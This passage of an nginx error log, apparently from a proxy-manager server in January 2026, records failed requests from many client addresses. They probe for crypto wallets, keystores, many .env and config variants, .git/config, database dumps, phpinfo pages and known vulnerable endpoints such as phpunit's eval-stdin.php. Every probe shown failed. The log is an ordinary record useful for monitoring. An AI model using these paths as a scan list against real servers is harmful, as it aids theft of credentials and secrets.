HTTP/1.1", host: "92.249.249.197" +2026/01/15 23:12:09 [error] 328#328: *131033 open() "/var/www/html/wallet.dat" failed (2: No such file or directory), client: 34.138.101.23, server: localhost-nginx-proxy-manager, request: "GET /wallet.dat HTTP/1.1", host: "92.249.249.197" +2026/01/15 23:12:09 [error] 328#328: *131034 open() "/var/www/html/.wallet.dat" failed (2: No such file or directory), client: 34.138.101.23, server: localhost-nginx-proxy-manager, request: "GET /.wallet.dat HTTP/1.1", host: "92.249.249.197" +2026/01/15 23:12:09 [error] 328#328: *131035 open() "/var/www/html/keystore" failed (2: No such file or directory), client: 34.138.101.23, server: localhost-nginx-proxy-manager, request: "GET /keystore HTTP/1.1", host: "92.249.249.197" +2026/01/15 23:12:09 [error] 328#328: *131036 open() "/var/www/html/utc" failed (2: No such file or directory), client: 34.138.101.23, server: localhost-nginx-proxy-manager, request: "GET /utc HTTP/1.1", host: "92.249.249.197" +2026/01/15 23:12:10 [error] 328#328: *131037 open() "/var/www/html/wallet.json" failed (2: No such file or directory), client: 34.138.101.23, server: localhost-nginx-proxy-manager, request: "GET /wallet.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 23:12:10 [error] 328#328: *131038 open() "/var/www/html/backup.json" failed (2: No such file or directory), client: 34.138.101.23, server: localhost-nginx-proxy-manager, request: "GET /backup.json HTTP/1.1", host: "92.249.249.197" +2026/01/15 23:12:10 [error] 328#328: *131039 open() "/var/www/html/default_wallet" failed (2: No such file or directory), client: 34.138.101.23, server: localhost-nginx-proxy-manager, request: "GET /default_wallet HTTP/1.1", host: "92.249.249.197" +2026/01/15 23:12:10 [error] 328#328: *131040 open() "/var/www/html/electrum.dat" failed (2: No such file or directory), client: 34.138.101.23, server: localhost-nginx-proxy-manager, request: "GET /electrum.dat HTTP/1.1", host: "92.249.249.197" +2026/01/15 23:12:11 [error] 328#328: *131041 open() "/var/www/html/default_wallet.dat" failed (2: No such file or directory), client: 34.138.101.23, server: localhost-nginx-proxy-manager, request: "GET /default_wallet.dat HTTP/1.1", host: "92.249.249.197" +2026/01/15 23:12:11 [error] 328#328: *131042 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.138.101.23, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/15 23:12:11 [error] 328#328: *131043 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 34.138.101.23, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "92.249.249.197" +2026/01/15 23:12:11 [error] 328#328: *131044 open() "/var/www/html/backup.sql" failed (2: No such file or directory), client: 34.138.101.23, server: localhost-nginx-proxy-manager, request: "GET /backup.sql HTTP/1.1", host: "92.249.249.197" +2026/01/15 23:12:12 [error] 328#328: *131045 open() "/var/www/html/database.sql" failed (2: No such file or directory), client: 34.138.101.23, server: localhost-nginx-proxy-manager, request: "GET /database.sql HTTP/1.1", host: "92.249.249.197" +2026/01/15 23:12:12 [error] 328#328: *131046 open() "/var/www/html/dump.rdb" failed (2: No such file or directory), client: 34.138.101.23, server: localhost-nginx-proxy-manager, request: "GET /dump.rdb HTTP/1.1", host: "92.249.249.197" +2026/01/15 23:12:12 [error] 329#329: *131047 open() "/var/www/html/admin/config.php.bak" failed (2: No such file or directory), client: 34.138.101.23, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php.bak HTTP/1.1", host: "92.249.249.197" +2026/01/15 23:41:36 [error] 329#329: *131052 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/15 23:50:51 [error] 329#329: *131053 "/var/www/html/bins/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bins/ HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 00:44:09 [error] 329#329: *131084 open() "/var/www/html/logon.htm" failed (2: No such file or directory), client: 93.123.72.132, server: localhost-nginx-proxy-manager, request: "GET /logon.htm HTTP/1.1", host: "127.0.0.1" +2026/01/16 00:46:33 [error] 329#329: *131085 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 102.22.20.125, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "92.249.249.197" +2026/01/16 00:51:07 [error] 329#329: *131087 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "92.249.249.197:80", referrer: "http://92.249.249.197:80/home.asp" +2026/01/16 00:52:21 [error] 329#329: *131088 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 01:37:41 [error] 330#330: *131097 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 02:24:24 [error] 330#330: *131112 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 93.123.72.132, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 02:47:08 [error] 331#331: *131115 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 03:20:11 [error] 331#331: *131121 open() "/var/www/html/.env" failed (2: No such file or directory), client: 91.244.197.123, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/16 03:33:29 [error] 331#331: *131123 open() "/var/www/html/index.asp" failed (2: No such file or directory), client: 204.76.203.20, server: localhost-nginx-proxy-manager, request: "GET /index.asp HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 03:44:08 [error] 331#331: *131127 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 03:44:08 [error] 331#331: *131128 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.224, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 03:46:50 [error] 331#331: *131130 open() "/var/www/html/.env" failed (2: No such file or directory), client: 195.178.110.190, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 03:47:00 [error] 331#331: *131132 open() "/var/www/html/.env" failed (2: No such file or directory), client: 195.178.110.190, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 03:57:21 [error] 330#330: *132627 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 162.142.125.124, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "92.249.249.197" +2026/01/16 04:00:35 [error] 330#330: *132628 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "92.249.249.197:80", referrer: "http://92.249.249.197:80/home.asp" +2026/01/16 04:23:35 [error] 330#330: *132639 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 91.224.92.14, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "92.249.249.197:80", referrer: "http://92.249.249.197:80/home.asp" +2026/01/16 06:12:51 [error] 335#335: *132661 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.169.49.41, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "92.249.249.197" +2026/01/16 06:20:24 [error] 335#335: *132667 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 91.232.238.112, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "92.249.249.197" +2026/01/16 06:22:50 [error] 335#335: *132669 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 91.232.238.106, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.0", host: "92.249.249.197" +2026/01/16 06:46:00 [error] 336#336: *132673 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 08:04:54 [error] 336#336: *132691 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 09:39:49 [error] 337#337: *132721 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 10:00:28 [error] 338#338: *132752 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:28 [error] 338#338: *132753 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:28 [error] 338#338: *132754 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:28 [error] 338#338: *132755 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:29 [error] 338#338: *132756 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:29 [error] 338#338: *132757 open() "/var/www/html/app_dev.php/_profiler/phpinfo" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/phpinfo HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:29 [error] 338#338: *132760 open() "/var/www/html/staging/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /staging/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:29 [error] 338#338: *132761 open() "/var/www/html/app_dev.php/_profiler/open" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:29 [error] 338#338: *132762 open() "/var/www/html/phpinfo.php" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /phpinfo.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:30 [error] 338#338: *132763 "/var/www/html/info/index.html" is not found (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /info/ HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:30 [error] 338#338: *132764 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:30 [error] 338#338: *132765 "/var/www/html/phpinfo/index.html" is not found (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /phpinfo/ HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:30 [error] 338#338: *132766 open() "/var/www/html/dev/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /dev/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:30 [error] 335#335: *132767 open() "/var/www/html/.env.production" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.production HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:31 [error] 335#335: *132768 open() "/var/www/html/.env.save" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.save HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:31 [error] 335#335: *132769 open() "/var/www/html/demo/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /demo/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:31 [error] 335#335: *132770 open() "/var/www/html/laravel/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /laravel/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:31 [error] 335#335: *132771 open() "/var/www/html/.config.yaml" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.config.yaml HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:31 [error] 335#335: *132772 open() "/var/www/html/info" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /info HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:31 [error] 335#335: *132773 open() "/var/www/html/secrets.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /secrets.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:31 [error] 335#335: *132774 open() "/var/www/html/core/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /core/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:31 [error] 335#335: *132775 open() "/var/www/html/server/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /server/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 10:00:32 [error] 335#335: *132776 open() "/var/www/html/test/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /test/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 11:12:39 [error] 345#345: *133111 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 12:21:16 [error] 344#344: *134894 open() "/var/www/html/login" failed (2: No such file or directory), client: 199.45.154.141, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "92.249.249.197" +2026/01/16 12:25:41 [error] 345#345: *134897 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 65.49.1.52, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "92.249.249.197" +2026/01/16 12:27:53 [error] 345#345: *134900 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 65.49.1.52, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "92.249.249.197" +2026/01/16 13:51:32 [error] 342#342: *134944 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 93.123.72.132, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 14:29:00 [error] 342#342: *134962 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "92.249.249.197:80" +2026/01/16 14:29:00 [error] 343#343: *134967 open() "/var/www/html/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:00 [error] 343#343: *134967 open() "/var/www/html/phpinfo" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /phpinfo HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:00 [error] 343#343: *134967 open() "/var/www/html/phpinfo.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /phpinfo.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:00 [error] 343#343: *134967 open() "/var/www/html/portal/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /portal/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:00 [error] 343#343: *134967 open() "/var/www/html/env/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /env/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:01 [error] 343#343: *134967 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:01 [error] 343#343: *134967 open() "/var/www/html/app/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /app/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:01 [error] 343#343: *134967 open() "/var/www/html/dev/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /dev/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:01 [error] 343#343: *134967 open() "/var/www/html/new/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /new/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:01 [error] 343#343: *134967 open() "/var/www/html/new/.env.local" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /new/.env.local HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:01 [error] 343#343: *134967 open() "/var/www/html/new/.env.production" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /new/.env.production HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:01 [error] 343#343: *134967 open() "/var/www/html/new/.env.staging" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /new/.env.staging HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:01 [error] 343#343: *134967 open() "/var/www/html/_phpinfo.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /_phpinfo.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:01 [error] 343#343: *134967 open() "/var/www/html/_profiler/phpinfo" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /_profiler/phpinfo HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:01 [error] 343#343: *134967 open() "/var/www/html/_profiler/phpinfo/info.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /_profiler/phpinfo/info.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:01 [error] 343#343: *134967 open() "/var/www/html/_profiler/phpinfo/phpinfo.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /_profiler/phpinfo/phpinfo.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:01 [error] 343#343: *134967 open() "/var/www/html/wp-config" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /wp-config HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:01 [error] 343#343: *134967 open() "/var/www/html/aws-secret.yaml" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /aws-secret.yaml HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:01 [error] 343#343: *134967 open() "/var/www/html/awstats/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /awstats/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:01 [error] 343#343: *134967 open() "/var/www/html/conf/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /conf/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:02 [error] 343#343: *134967 open() "/var/www/html/cron/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /cron/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:02 [error] 343#343: *134967 open() "/var/www/html/www/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /www/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:02 [error] 343#343: *134967 open() "/var/www/html/docker/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /docker/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:02 [error] 343#343: *134967 open() "/var/www/html/docker/app/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /docker/app/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:02 [error] 343#343: *134967 open() "/var/www/html/env.backup" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /env.backup HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:02 [error] 343#343: *134967 open() "/var/www/html/xampp/phpinfo.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /xampp/phpinfo.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:02 [error] 343#343: *134967 open() "/var/www/html/lara/info.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /lara/info.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:02 [error] 343#343: *134967 open() "/var/www/html/lara/phpinfo.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /lara/phpinfo.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:02 [error] 343#343: *134967 open() "/var/www/html/laravel/info.php" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /laravel/info.php HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:02 [error] 343#343: *134967 open() "/var/www/html/.vscode/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.vscode/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:02 [error] 343#343: *134967 open() "/var/www/html/js/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /js/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:02 [error] 343#343: *134967 open() "/var/www/html/laravel/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /laravel/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:02 [error] 343#343: *134967 open() "/var/www/html/laravel/core/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /laravel/core/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:02 [error] 343#343: *134968 open() "/var/www/html/mail/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /mail/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:02 [error] 343#343: *134968 open() "/var/www/html/mailer/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /mailer/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:02 [error] 343#343: *134968 open() "/var/www/html/nginx/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /nginx/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:03 [error] 343#343: *134968 open() "/var/www/html/public/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /public/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:03 [error] 343#343: *134968 open() "/var/www/html/site/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /site/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:03 [error] 343#343: *134968 open() "/var/www/html/xampp/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /xampp/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:03 [error] 343#343: *134968 open() "/var/www/html/main/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /main/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:03 [error] 343#343: *134968 open() "/var/www/html/node_modules/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /node_modules/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:03 [error] 343#343: *134968 open() "/var/www/html/kyc/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /kyc/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:03 [error] 343#343: *134968 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:03 [error] 343#343: *134968 open() "/var/www/html/prod/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /prod/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:03 [error] 343#343: *134968 open() "/var/www/html/.env.bak" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env.bak HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:03 [error] 343#343: *134968 open() "/var/www/html/api/shared/config/config.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /api/shared/config/config.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:03 [error] 343#343: *134968 open() "/var/www/html/api/shared/config.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /api/shared/config.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:03 [error] 343#343: *134968 open() "/var/www/html/config.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /config.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:03 [error] 343#343: *134968 open() "/var/www/html/website/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /website/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:03 [error] 343#343: *134968 open() "/var/www/html/development/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /development/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:03 [error] 343#343: *134968 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:03 [error] 343#343: *134968 open() "/var/www/html/api/shared/config/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /api/shared/config/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:03 [error] 343#343: *134968 open() "/var/www/html/api/shared/.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /api/shared/.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:04 [error] 343#343: *134968 open() "/var/www/html/api/config.env" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /api/config.env HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:04 [error] 343#343: *134968 open() "/var/www/html/service/email_service.py" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /service/email_service.py HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:04 [error] 343#343: *134968 open() "/var/www/html/node/.env_example" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /node/.env_example HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:04 [error] 343#343: *134968 open() "/var/www/html/.env.production.local" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env.production.local HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:04 [error] 343#343: *134968 open() "/var/www/html/.env.local" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env.local HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:04 [error] 343#343: *134968 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:04 [error] 343#343: *134968 open() "/var/www/html/.env.stage" failed (2: No such file or directory), client: 45.148.10.247, server: localhost-nginx-proxy-manager, request: "GET /.env.stage HTTP/1.1", host: "92.249.249.197" +2026/01/16 14:29:04 [error] 343#343: *134968 open() "/var/www/html/.env.old" failed 